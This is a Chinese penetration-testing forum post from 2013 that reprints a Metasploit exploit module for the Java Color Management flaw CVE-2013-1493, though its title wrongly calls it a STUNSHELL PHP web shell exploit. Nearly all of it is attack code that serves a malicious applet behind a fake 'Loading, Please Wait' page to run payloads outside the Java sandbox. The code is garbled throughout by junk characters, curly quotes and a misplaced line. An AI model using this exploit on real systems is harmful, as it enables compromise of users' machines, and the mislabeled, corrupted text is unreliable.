中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##

" ~( ?- J$ V; y0 n# This file is part of the Metasploit Framework and may be subject to
3 f$ u& j6 ?$ k' D5 F, Q# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
4 ^% O3 k2 A# B; Frequire ‘msf/core’
require ‘rex’
  I& U- w3 P0 K& S8 aclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
/ g" r" L/ W5 U) g8 |  j; g5 qinclude Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
5 _: n" ^' D5 S" \autopwn_info({ :javascript => false })
def initialize( info = {} )
) D6 n# o* J  n* x1 P; N* ~  isuper( update_info( info,
' a# z; O/ b* Y6 T+ N% V7 s1 y. u# U‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
8 x- \, u* t+ M$ iand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
! i  [: g' K3 Z  }and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
) w" m5 q* T$ [. E# Esystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
2 m: m* v( |- `1 L! l! {warning in order to run the malicious applet.
},
‘License’ => MSF_LICENSE,
  B) o) U, L! A+ }. w‘Author’ =>
% |$ R9 r* E2 r# ~'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
/ ?1 Z7 i, M0 E8 m‘References’ =>
4 N' z; B8 h: M[
4 c( ?7 o" ?0 u  u8 Z5 r[ 'CVE', '2013-1493' ],
. T( \: q  C8 G: j[ 'OSVDB', '90737' ],
' t6 ]3 c4 m& N5 f  `+ i9 h- u[ 'BID', '58238' ],
, z1 w2 t7 U1 A* `[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
& o5 l% N/ S! ~3 `[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
: t5 E, [# F, X) i$ y[ 'URL', 'http://pastie.org/pastes/6581034' ]
7 I; h! v( M$ h: i3 _! K4 U: I],
‘Platform’ => [ 'win', 'java' ],
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
' N6 k" r# ]3 p4 a5 k- T‘Targets’ =>
+ f4 p8 C0 K  ]4 o5 E[
[ 'Generic (Java Payload)',
8 }9 l4 h1 a- W{
'Platform' => 'java',
'Arch' => ARCH_JAVA
, L4 r8 a0 k# o: r! `}
],
. \9 X- e  M( q! f6 I: }8 ~& j[ 'Windows x86 (Native Payload)',
) o+ `# N" {) Q9 Z7 O% S, A{
'Platform' => 'win',
'Arch' => ARCH_X86
" d' ?5 N8 Y5 T}
]
],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
6 g# D4 {, U0 s6 K@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
6 }( r# I. C0 P% q1 M6 g6 [# h@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% Z6 E) I. G9 D8 j0 n) M) C% N# X3 O@init_class_name = rand_text_alpha(“Init”.length)
/ o  Q# d0 v( L' g2 v4 w@init_class.gsub!(“Init”, @init_class_name)
super
0 v. V9 {. I  i! N% Uend
4 Y% ?, x; h4 [# i: @! bdef on_request_uri(cli, request)
* }: @3 o* D3 Mprint_status(“handling request for #{request.uri}”)
case request.uri
when /\.jar$/i
/ Q+ c- d8 n# P3 Y9 M; d' k! n* Cjar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
1 _$ G3 \8 U: j% ]& Jjar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
5 i; j6 q! o) Q9 jjar.add_file(“MyColorSpace.class”, @color_space_class)
DefaultTarget’ => 1,
8 \0 P) q/ r7 t* k6 j  \% Fmetasploit_str = rand_text_alpha(“metasploit”.length)
payload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
, E0 o$ z$ e/ Q0 w1 [* ientry.name.gsub!(“metasploit”, metasploit_str)
) [9 ?7 n: w3 p0 gentry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
}
0 R( F+ `* s* j- Ljar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
% o- q; k1 Z4 U9 M$ ~* Lwhen /\/$/
payload = regenerate_payload(cli)
  O( i6 V; K# W: t9 p" yif not payload
1 C) A! Y& O. J1 Yprint_error(“Failed to generate the payload.”)
$ \4 I, S% G$ K1 ksend_not_found(cli)
7 \: S% t9 p7 q) l' F$ Rreturn
) I8 Y7 _* e5 w# c4 j, z" ~end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
+ A5 G# m  s& ^( C  Q9 ~2 m; eelse
send_redirect(cli, get_resource() + ‘/’, ”)
end
- o5 @0 o- I4 ?6 Y* Iend
3 ?. ]; ]. X2 A& q2 g0 X! l" i, Ddef generate_html
5 }5 G4 ^# I- e3 a, X4 O8 b1 ]html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
& @  S6 m6 P- g" [/ u) e( j2 ?html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
- g  U8 C5 v; L$ }, V+ _/ Dhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
/ P/ [: x' X% H1 F: o6 Z/ N3 whtml += %Q|</applet></body></html>|
/ z5 N# a4 @2 E5 i/ Z9 S3 k. ]0 lreturn html
end
; y. C& H9 S3 l( }2 ^: send
end

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2